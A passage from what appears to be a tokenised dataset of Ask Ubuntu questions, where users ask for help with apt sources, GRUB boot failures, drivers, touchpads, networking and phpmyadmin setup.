//cz.archive.ubuntu.com/ubuntu/ precise-backports main restricted multiverse universe deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise-backports main restricted multiverse universe # added by software-properties deb http : //security.ubuntu.com/ubuntu precise-security main restricted universe deb-src http : //security.ubuntu.com/ubuntu precise-security restricted main multiverse universe # added by software-properties deb http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //ddebs.ubuntu.com $ ( lsb_release -cs ) -proposed restricted -cs ) -security -cs ) -updates -cs ) universe main multiverse deb-src http : //ddebs.ubuntu.com $ ( lsb_release -cs ) -proposed restricted -cs ) -security -cs ) -updates -cs ) universe main multiverse . in the update manager , clicking at the 'check ' button results in a warning `` failed to download repository information . check your internet connection . '' with details w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -proposed/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/restricted/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -security/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -updates/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) /source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/universe/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/main/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/multiverse/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -proposed/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/restricted/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -security/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -updates/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) /binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/universe/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/main/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/multiverse/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . have i done a mistake or should i use the /etc/apt/sources.list file from the second pc ? thanks !
515426	bumblebee error under 12.04.5 amd64 with kernel 3.13.0-34-generic	my notebook has i5-2450m cpu and nvidia gt550m video driver . i installed ubuntu 12.04.5 amd64 with kernel 3.13.0-34-generic . after booted , i run the following three commands consecutively . $ optirun -- status bumblebee status : ready ( 3.2.1 ) . x inactive . discrete video card is off . $ optirun glxgears 5263 frames in 5.0 seconds = 1052.453 fps 5521 frames in 5.0 seconds = 1103.996 fps 5505 frames in 5.0 seconds = 1100.859 fps [ vgl ] error : in readback -- [ vgl ] 247 : window has been deleted by window manager $ optirun -- status bumblebee status : error ( 3.2.1 ) : [ xorg ] ( ee ) server terminated successfully ( 0 ) . closing log file . what is the matter about the third command `` optirun -- status '' ? thanks
515427	gnome-elf-thumbnailer error while upgrading	i was attempting an `` apt-get upgrade '' through terminal . it came back with this error message : '' errors were encountered while processing : gnome-elf-thumbnailer '' now with looking at the line of command i find this : '' warning : /usr/share/gconf/schemas/elf-exe-thumbnailer.schemas could not be found . '' needless to say my ubuntu is broken and needs repair for a complete upgrade or update to work . i tried googling for an answer but i just am not typing the right question because i am not finding anything . can someone help . i would like to get this fixed .
515429	installing from git hub onto kubuntu	here 's a studid question from a beginner : usually when i download programs , it 's done via the terminal using sudo apt-get or in the software center . but i want to install a screenshot saver stored on git https : //github.com/chriszeta/scrot-and-imgur-zenity-gui in the readme file i saw no instruction on how to install it . i downloaded the zip-file but now i do n't know what to do . ps what i want to achieve is : each time i press prtsc or ctrl+prsc i save a file named screenshot_todaysdate to /dropbox/folder and then the url is pasted to my clipboard .
515430	driver for wireless mouse	anyone knows how to configure this mouse ( http : //www.ebay.com/itm/2-4ghz-high-qulity-wireless-optical-mouse-mice-usb-2-0-receiver-for-pc-laptop-/400592691497 ? pt=mice & hash=item5d452f6129 ) to use on ubuntu 14.04 here is the output for xinput | virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ hp truevision hd id=10 [ slave keyboard ( 3 ) ] ↳ telink wireless receiver id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=14 [ slave keyboard ( 3 ) ]
515432	execute command from file in current shell	i want to executed command from file ( which is script ) in current shell in terminal . example : i have file ch_dir contains following : # ! /bin/bash cd /usr now if i execute file usually as following then it executes commands in different shell : pandya @ pandya-desktop : ~ $ ./ch_dir pandya @ pandya-desktop : ~ $ here cd /user is executed in different shell . but i want to execute in current shell . how do i do that ? note : here cd is only used to explain . question 's aim is to execute any command in current shell
515438	why i can not mount iso file from this .desktop file by `fuseiso` ?	i want to mount iso files without root permission by fuseiso , and this is how to mount a iso file : fuseiso -p '/path/to/isofilename ' '/media/isofilename' , so i make a .desktop file followed freedesktop standard ( the exec key ) as bellow : # ! /usr/bin/env xdg-open [ desktop entry ] name=mount iso image name [ zh_tw ] =掛載光碟映像檔 exec=fuseiso -p % u `` /media/ $ ( basename % u ) '' terminal=false mimetype=application/x-cd-image , but it failed . i think it failed because of $ ( basename % u ) , if it is changed to a fixed string , the iso file can be mounted . how can i solve this problem ?
515440	ubuntu 14.04 screen becomes unreadable	before lightdm installed : when starting there is no issue , after some time the screen becomes like this . along with icons right and left click menus are also unable to read . what to do ? the issue is in ubuntu 14.04 uname -a = > ... 3.13.0-34-generic # 60-ubuntu smp ... x86_64 x86_64 x86_64 gnu/linux after gdm ( in which lightdm ) installed : [ +0.02s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.02s ] debug : starting light display manager 1.10.1 , uid=0 pid=5023 [ +0.02s ] debug : loading configuration dirs from /usr/share/lightdm/lightdm.conf.d [ +0.02s ] debug : loading configuration from /usr/share/lightdm/lightdm.conf.d/50-greeter-wrapper.conf [ +0.02s ] debug : loading configuration from /usr/share/lightdm/lightdm.conf.d/50-guest-wrapper.conf [ +0.02s ] debug : loading configuration from /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf [ +0.02s ] debug : loading configuration from /usr/share/lightdm/lightdm.conf.d/50-unity-greeter.conf [ +0.02s ] debug : loading configuration from /usr/share/lightdm/lightdm.conf.d/50-xserver-command.conf [ +0.02s ] debug : loading configuration dirs from /usr/local/share/lightdm/lightdm.conf.d [ +0.02s ] debug : loading configuration dirs from /etc/xdg/lightdm/lightdm.conf.d [ +0.02s ] debug : loading configuration from /etc/lightdm/lightdm.conf [ +0.02s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.02s ] debug : using xephyr for x servers [ +0.02s ] debug : registered seat module xlocal [ +0.02s ] debug : registered seat module xremote [ +0.02s ] debug : registered seat module unity [ +0.02s ] debug : registered seat module surfaceflinger [ +0.06s ] debug : adding default seat [ +0.06s ] debug : seat : starting [ +0.06s ] debug : seat : creating greeter session [ +0.09s ] debug : seat : creating display server of type x [ +0.14s ] debug : using vt 7 [ +0.14s ] debug : seat : starting local x display on vt 7 [ +0.14s ] debug : displayserver x-1 : logging to /var/log/lightdm/x-1.log [ +0.15s ] debug : displayserver x-1 : writing x server authority to /var/run/lightdm/root/:1 [ +0.15s ] debug : displayserver x-1 : launching x server [ +0.17s ] debug : launching process 5027 : /usr/bin/xephyr :1 -seat seat0 -auth /var/run/lightdm/root/:1 -nolisten tcp vt7 -novtswitch [ +0.17s ] debug : displayserver x-1 : waiting for ready signal from x server :1 [ +0.17s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.17s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 still problem persists , lspci : 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 10 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation nm10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 01 ) glxinfo | grep opengl : opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) g33 opengl version string : 1.4 mesa 10.1.3 opengl extensions : > cat /var/log/xorg.0.log|grep ww [ 22.452 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 22.452 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 22.452 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 22.453 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 22.453 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 23.822 ] ( ww ) falling back to old probe method for modesetting [ 23.822 ] ( ww ) falling back to old probe method for fbdev [ 23.822 ] ( ww ) falling back to old probe method for vesa edit aug-26-2014 ccsmanager all effected disabled already .
515442	no root partition	i 'm having serious problems trying to install ubuntu 14.04 on my toshiba satellite c850 laptop . whenever i try to install it it says `` no root file system found . please correct this error from the partitioning menu . '' i 've tried to create new partitions but i do n't know what size to make them etc . can someone please help me on this ? ( is there a way to create partitions through the terminal ? i 'm new to ubuntu ) but i was on it 2 days ago , laptops crashed and now i ca n't get past the installation . i 've created a new partitioning table just need guidance on which partitions to create and how big to make them . i have absolutely no partitions whatsoever on my hard drive ( or whatever the partitions are part of ) so it will need to be from the very start . thanks in advance !
515445	nvidia x server setting no specific option	i just freshly installed ubuntu 14.04 and did only 4 things : 1 ) $ sudo add-apt-repository ppa : xorg-edgers/ppa $ sudo apt-get update $ sudo apt-get install nvidia-340 2 ) sudo apt-get install nvidia-current-updates nvidia-settings-updates 3 ) went to software & updates/additional drivers and chosen using nvidia binary driver - version 340.32 from nvidia-340 ( open source ) i had to do part 3 because after part 1 i had driver version 304 now to the main part . i cant set up custom resolution . when i had ubuntu 12.04 year ago there was option in nvidia x server setting called `` add custom resolution '' or something like that and it was alright . now this option is gone . how can i change/add custom resolution ?
515451	tor vidalia browser problem	so vidalia is up and running fine but the browser has not installed properly , like it has before . before i just clicked on the onion icon , it would say launching tor ... , you are now connected , the browser would start up and inform me i am connected to network with the browser page . now , when i click vidalia in the menu the onion icon appears at the top of my screen , which informs me i 'm connected to the network . i can view a drop daown menu telling me about the network map and control panel but no browser to surf the tor network with . is it because its a new version and using firefox normally is basically the same thing , because everything is now going through the tor network that way ? prob need to alter something or download the browser seperatly donât know . thanks
515452	alternate for powerworld simulator	i have used powerworld simulator in windows . but this software is unavailable for ubuntu . is there any alternate for this software ?
515453	use ubuntu as internet gateway	i do have the following setup and would like my ubuntu pc to work as the gateway to the internet : access point : 192.168.2.1 ubuntu ( wlan0 ) : 192.168.2.2 various other clients : 192.168.2.x now , ubuntu has access to the internet via tun0 and i would like to let the other client access the internet via my pc . so far , the other clients in the wlan ( 192.168.2.x ) can reach ( ping ) 192.168.2.2 , but not the internet . kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.12.0.5 128.0.0.0 ug 0 0 0 tun0 0.0.0.0 192.168.178.1 0.0.0.0 ug 0 0 0 eth0 10.12.0.1 10.12.0.5 255.255.255.255 ugh 0 0 0 tun0 10.12.0.5 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 128.0.0.0 10.12.0.5 128.0.0.0 ug 0 0 0 tun0 178.63.194.204 192.168.178.1 255.255.255.255 ugh 0 0 0 eth0 192.168.2.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 192.168.178.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 ifconfig eth0 link encap : ethernet hwaddr de : ad : de : de : be : af inet addr:192.168.178.3 bcast:192.168.178.255 mask:255.255.255.0 inet6 addr : fe80 : :daad : deff : faad : beef/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1456338 errors:0 dropped:0 overruns:0 frame:0 tx packets:714748 errors:1 dropped:0 overruns:1 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2079202398 ( 1.9 gib ) tx bytes:192855866 ( 183.9 mib ) interrupt:51 tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.12.0.6 p-t-p:10.12.0.5 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:1380161 errors:0 dropped:0 overruns:0 frame:0 tx packets:451457 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:1857300971 ( 1.7 gib ) tx bytes:24547435 ( 23.4 mib ) wlan0 link encap : ethernet hwaddr 43:44:1c:1b : a4:21 inet addr:192.168.2.2 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :4633:4cff : fe1b:6421/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:124 overruns:0 frame:0 tx packets:0 errors:0 dropped:3 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3439470 ( 3.2 mib ) tx bytes:98817 ( 96.5 kib )
515454	boot problem in ubuntu 14.04	after cold starting ubuntu 14.04 , i had a severe problem during booting : mounting /dev/loop0 on /root/dev failed : no such file or directory mounting /dev on /root/sys failed : no such file or directory mounting /proc on /root/proc failed : no such file or directory target file system does n't have requested /sbin/init . no init found . try passing init = bootarg . also the busybox ( initramfs ) opens up , but i do not know what i have to change to properly boot the system again . it would be great , if someone could help me out .
515457	mouse color change and auto selecting the screen location	when placing cursor on the new screen pointer it is automatically selecting that particular screen location , and going orange . how can i take it off . by that while i am in one task it automatically selecting another task which irritating me very much . is there any solution for that ?
515458	automattically mapping a key to a different key on every boot	i use a toshiba satellite c6four0 laptop . my four number key ( dollar symbol ) is busted . so using the very same online forum i opened up terminal find out the codes of my keyboard and mapped it to the `` right alt key `` . xmodmap -e `` keysym alt_r = 4 dollar 4 dollar '' but the problem is on every starting of my system i have to re-enter the command . is there any way i can make it permanent so not to repeat it every time .
515460	how can one strengthen wireless signal ?	my question is on the title . all my ubuntu installations ( 12.04 , 13.10 and 14.04 ) receive significantly weaker wi-fi signals , compared to the pre-installed w8 system on the same machine . do i need to seek for adapter driver software ? if so , where can i find it ?
515461	create full folder structure from `` new document '' ( templates ) menu	if i create a folder inside templates , when i click `` new document '' > `` myfolder '' it does nothing . that is just a sub directory to organize the templates . but maybe it would be useful to create that folder hierarchy . for instance : i have all these files and folders : ~/template/tm1.txt ~/template/tm2.txt ~/template/myfolder/ ~/template/myfolder/subfolder/ ~/template/myfolder/subfolder/hello1.html ~/template/myfolder/subfolder/hello2.html ~/template/myfolder/subfolder/hello3.html ~/template/myfolder/index.html so when i click `` new document '' > `` myfolder '' i 'd like to create `` myfolder '' with `` subfolder '' and index.html ( etc ... . ) . is there any way to do this ? i know that `` new document '' is n't the same as `` new folder '' , but maybe this should be called `` new template '' .
515463	xchat unable to connect	i am using xubuntu 12.04.4 lts . i have been trying to connect to freenode irc server through xchat application but i am getting the following error : looking up irc.freenode.net * connecting to chat.freenode.net ( 38.229.70.20 ) port 8001 ... * connected . now logging in ... * *** looking up your hostname ... * *** checking ident * *** could n't look up your hostname * *** no ident response * closing link : 127.0.0.1 ( connection timed out ) * disconnected ( remote host closed socket ) . cycling to next server in freenode ... * disconnected ( ) . note : i am trying to connect from office-network .
515464	unable to configure the phpmyadmin	i installed phpmyadmin . it 's working when i opened the link http : //localhost/phpmyadmin there are no databases in the list of databases in the left pane of phpmyadmin . when i checked below it says phpmyadmin is not fully configured . following errors occurs : $ cfg [ 'servers ' ] [ $ i ] [ 'pmadb ' ] = 'phpmyadmin ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__bookmarktable ' ] = 'pma__bookmark ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__relation ' ] = 'pma__relation ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__table_info ' ] = 'pma__table_info ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__table_coords ' ] = 'pma__table_coords ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__pdf_pages ' ] = 'pma__pdf_pages ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__column_info ' ] = 'pma__column_info ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__history ' ] = 'pma__history ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__table_uiprefs ' ] = 'pma__table_uiprefs ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__tracking ' ] = 'pma__tracking ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__designer_coords ' ] = 'pma__designer_coords ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__userconfig ' ] = 'pma__userconfig ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__recent ' ] = 'pma__recent ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__favorite ' ] = 'pma__favorite ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__users ' ] = 'pma__users ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__usergroups ' ] = 'pma__usergroups ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__navigationhiding ' ] = 'pma__navigationhiding ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__savedsearches ' ] = 'pma__savedsearches ' ; $ cfg [ 'servers ' ] [ $ i ] [ 'pma__table_uiprefs ' ] = 'pma__table_uiprefs ' ; can anyone help me ? do i have to manually configure the settings or there is something we can do to solve it ?
515466	software-update 14.04 lts impossible	i am new to ubuntu . when clicking update , following message appears : installation of packages required , which can not be trusted . this process requires the installation of packages from unsigned sources . anybody there who can help ?
515470	grub is not booting correctly	i have a pc with three hard disks . windows 7 is installed on the first , ubuntu 14.04 is installed on the third . after i re-booted , it went straight to windows 7 . so i tried explicitly telling my pc to boot using the third hard disk , but that just takes me to the grub rescue prompt . i followed scott severence 's instructions here to try and recover . essentially , i updated grub , reinstalled grub , and then updated it again . after re-booting , absolutely nothing had changed . so instead i tried using the boot-repair tool . in the past it had failed for me , saying that i had programs running and it could not unmount drives , when i was running nothing . i never figured out how to solve that problem , but it went away when i bought another hard drive and used that for my ubuntu installation , i do n't know why . in any case , i ran the boot-repair tool and this time it said it was successful . first time for everything right ? i re-booted , only to be taken straight to the grub rescue prompt . so i changed my bios settings to use the third hard disk for boot start up . that is the same hard drive where i have ubuntu and grub installed , and the same one that the grub-repair tool told me to use . it still took me straight to the grub rescue prompt . so i went from not being able to boot ubuntu , to not being able to boot either os installed on my system . thanks boot-repair ! boot repair gave me this url for future troubleshooting : http : //paste.ubuntu.com/8131669 when i try to boot from the third hard disk , this is my console : loading operating system ... error : attempt to read or write outside of disk 'hd0 ' . entering rescue mode ... grub rescue > grub rescue > set cmdpath= ( hd0 ) prefix= ( hd0 , gpt2 ) /boot/grub root=hd0 , gpt2 grub rescue > ls ( hd0 ) ( hd0 , gpt3 ) ( hd0 , gpt2 ) ( hd0 , gpt1 ) ( hd1 ) ( hd2 ) ( hd2 , gpt2 ) ( hd2 , gpt1 ) ( hd3 ) those values look correct to me . i have also experimented with changing some of those values , but 'insmod normal ' always throws the same error . somebody please tell me how to fix this . i have tried everything , reinstalling grub , and running boot-repair . =========================== update : i think the problem might be that the ubuntu installer did not partition my hard disk correctly . i booted from live usb and then launched gparted and looked at how it partitioned things . this is what gparted says : partition , file system , size , used , unused , flags /dev/sda1 ( ! ) , unknown , 1.00 mib , -- - , -- - , bios_grub /dev/sda2 , ext4 , 2.71 tib , 47.30 gib , 2.67 tib , /dev/sda3 , linux-swap , 16.00 gib , 0.00 b , 16.00 gib , so that first line looks problematic . it is supposed to be the /boot partition . however , it was given only 1 mib ? i am assuming that mib is actually supposed to mean megabyte , no idea why that 'i ' is there . it also says the file system is unknown . i read the answer by andrew here , and he says he had to do a custom install , explicitly configuring the boot partition . so i think that maybe ubuntu 's installer has a bug in it , where it does not set up the boot partition correctly if you are not installing on the first hard disk in your computer . i am going to try reinstalling with a custom partition scheme . i read elsewhere ( askubuntu wo n't let me post another link ) that i do n't even need a /boot partition any more . so instead of following andrew 's instructions ver batim , i 'm first going to try having just two partitions : one for / , and another for my 16gb swap space . both as primary partitions . the first will be formatted as ext4 . if that does n't work , i may try again using /boot . ======================== so i did my custom install with no /boot partition , and it did not work . when i rebooted , i had an error message saying that some address did not exist . so for the hundredth time , i booted from the live usb , and ran boot-repair . now i get this message gpt detected . please create a bios-boot partition ( > 1mb , unformatted filesystem , bios_grub flag ) . this can be performed via tools such as gparted . then try again . ======================= both of my attempts at making custom partitions during installation have failed . first i tried with no /boot and no bios_grub partition , then i tried with /boot but no bios_grub , neither worked . now i am trying the normal install one last time , and plan to use the boot-repair disk instead of boot-repair command line . ===================== the boot repair disk did not work , it would not even start . i tried one last time to do boot-repair from the live usb . this time when i rebooted , i told my bios to use the third hard disk the very first time . then it finally took me to a grub menu where i could choose an os to launch . unfortunately , when i chose ubuntu , it just immediately threw an exception and failed to launch . i am giving up on ubuntu . i have already wasted about 20 hours trying to install this just this weekend . nobody is giving me help , at least not help that works .
515474	not able to run ubuntu touch in ubuntu 14.04	i created a first project . and tried to run the application . but it showed following error . sent 960 bytes received 106 bytes 2.13k bytes/sec < br/ > total size is 40.97k speedup is 38.44 < br/ > 20:10:22 : the process `` /usr/bin/rsync '' exited normally . < br/ > warning : root : ignoring missing framework `` ubuntu-sdk-14.10-dev2 '' < br / > successfully built package in './com.ubuntu.developer.username.untitled_0.1_all.click ' . < br / > 20:10:31 : the process `` /usr/bin/click '' exited normally . 20:10:31 : the click package has been created in /home/vp7/ubuntu apps /build-untitled- ubuntusdk_for_i386_gcc_ubuntu_sdk_14_04_trusty-default 20:10:31 : deploy step failed . no valid device configured error while building/deploying project untitled ( kit : ubuntusdk for i386 ( gcc ubuntu-sdk-14.04-trusty ) ) when executing step 'upload files to ubuntu device' 20:10:32 : elapsed time : 00:11 . when i see list of devices running using adb devices the output was emulator-5556 device for uname -m the output is i686
515476	ca n't upgrade my ubuntu 12.04 to 14.04	i have ubuntu 12.04 lts on pc . when i 'm trying to upgrade it using software upgrader i click `` upgrade '' and its '' unable to load page problem occurred while loading the url http : //archive.ubuntu.com/ubuntu/dists/trusty-updates/main/dist-upgrader-all/current/releaseannouncement.html ? lang=ru_ru & os=ubuntu & ver=14.04.1 % 20lts can not resolve proxy hostname ( ) '' what i do wrong ?
515478	ubuntu heat increase since booted	today i installed psensor to check temperature of my pc while using folding at home web client ( folding via google chrome ) . then i decided to intall fah so i do n't have to use web version . i downloaded the package , though i did n't do anything with it . all of sudden , computer has started heating and cpu fan rpm has increased as well . cpu usage level were around 85 % -100 % . then i restarted pc and booted into windows xp , i got that safe-mode booting screen and selected to boot it normally . later i 've tried to reboot into ubuntu 14.04 and it started to increase heat since logged in . cpu usage level mode was around 85 % as well .
515479	i can not install ipython3-notebook in 12.04.5 amd64	when installing it , ubuntu gives the below message : ipython3-notebook : depends : ipython3 ( =0.13.2-1~ubuntu12.04.2 ) but 0.12.1+dfsg-0ubuntu1.1 is to be installed how to do with it ? thanks
515480	terminal wo n't show in failsafex	so after recently reinstalling some drivers i came across the issue detailed in this post how to fix `` the system is running in low-graphics mode '' error ? i run 12.04 on my hp laptop with an nvidia card . i went to grub and loaded failsafex to have the exact same problem described in the response up there , i then attempted to load the terminal , however when i do try and load the terminal i just get a blank screen and nothing else , is there any other easier way to access the terminal . i am quite new to ubuntu .
515482	why `initctl status tty1` gets `unknown job : tty1`	# initctl status tty1 initctl : unknown job : tty1 but there is a tty1.conf file in /etc/init and i have n't modified it : # cat /etc/init/tty1.conf # tty1 - getty # # this service maintains a getty on tty1 from the point the system is # started until it is shut down again . start on stopped rc runlevel= [ 2345 ] and ( not-container or container container=lxc or container container=lxc-libvirt ) stop on runlevel [ ! 2345 ] respawn exec /sbin/getty -8 38400 tty1
515483	dash lens does not search general stuff	i do n't know why , but my dash lens does not search general stuff like editor , libre office , etc i also do n't know how to open these stuff without dash lens !
515486	startup applications 14.04	i 'm trying to mount 3 partitions by default when i log in . i used to do that with the start up applications in 12.04 however there seems to be a nasty bug in 14.04 where false command duplicates are removed ( apparently , only the command is taken into account , even if the arguments differ ) . i tried using one single command instead of 3 , putting all the devices in one line ( something like /usr/bin/udisks -- mount /dev/sdb1 ; /usr/bin/udisks -- mount /dev/sdb2 ; /usr/bin/udisks -- mount /dev/sdb3 ; ) however it does not seem to work either . what can i do to have 3 partitions mounted by default ( with their label ) ? !
515487	ca n't get flash player , no app to use for download	i have tried to follow all the instruction given in other answers , but when i try to download flash player , i get a message to choose app to use for download . i ca n't find the one people say to use . help ! ! ! i need you tube ! ! !
515492	ca n't specify installation type	i 'm installing 14.04.1 from a livecd , onto a computer running windows 8 . everything seems to run perfectly , until i get to the `` installation type '' screen . there 's an empty main section with '+ ' , '- ' and 'change ' options , and a section showing the device for boot loader installation . the only option ( besides 'back ' and 'quit ' ) is 'install now'
515494	elantech touchpad not working in ubuntu 14.04	i just bought a new toshiba s50 b satellite laptop . i installed ubuntu 14.04 . everything works fine except the touchpad . i did xinput -list command . it shows : âł etps/2 elantech touchpad id=11 [ slave pointer ( 2 ) ] so , ubuntu detects there is touchpad but it is not working at all . nothing happens with the touchpad . can anyone tell me how to fix it ? i have also tried following links : ubuntu activate multi touch on elantech elantech touchpad not detected as ps/2 in exo nifty 7385
515495	terminal closing itself after 14.04 upgrade	all was fine in 12.04 , in this case i 'm using virtualbox in windows . the upgrading process ran ok , no errors , no warnings . after rebooting the errors started to happen . just after booting up there were some errors about video , gnome , and video textures ( sorry i did n't care in that moment so i do n't remember well ) . luckily that went away after installing virtualbox additions . but the big problem here is that i ca n't use the terminal . it opens ok when pressing ctrlaltt , but most of the commands cause instant closing . for example , df , ls , mv , cd ... usually work , although it has closed few times . but find causes instant close . apt-get update kills it too , just after it gets the package list from the sources , when it starts processing them . i 've tried xterm , everything works and i have none of that problems . i have tried reinstalling konsole , bash-static , bash-completion , but nothing worked . i have no idea what to do as there is no error message to search for the cause . it seems something related to bash , but that 's all i know .
515496	network is not starting in kubuntu 14.04	in windows xp pc i installed kubuntu 14.04 with dual booting . as network did not start due to ipv6 i changed /etc/network/interface file with ipv4 static addres and gw . then after it did not start . on reboot showing 'network connection failed ' . but on giving ipv4 address using ifconfig it works temporarily , again on reboot same problem . please help . this is a desktop installation . this is in the interface file : - interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto lo eth1 iface eth1 inet static address 192.9.51.9 netmask 255.255.255.0 network 192.9.51.0 broadcast 192.9.51.255 gateway 192.9.51.36
515497	restarted my laptop while installing the new 14.04 and now ca n't make it to start up	while i was installing the new ubuntu version , my laptop was re-started and now i 'm not able to make it to load or start up . what should i do ?
515498	error after installing lubuntu 14.04 through liveusb	a friend asked me to install ubuntu on his toshiba nb 200 netbook to replace windows xp . i formatted the flash drive , ran an nb5sum check on the iso and after running netbootin , i checked the drive for errors . no problems so far . during the installation , while everything seemed normal , the installation regularly paused until i pressed a button or moved the mouse . after restarting , it does n't boot and it starts a shell showing : `` general error mounting filesystems a maintenance shell will now be started control-d will terminate this shell and reboot the system `` any ideas ? any help is appreciated !
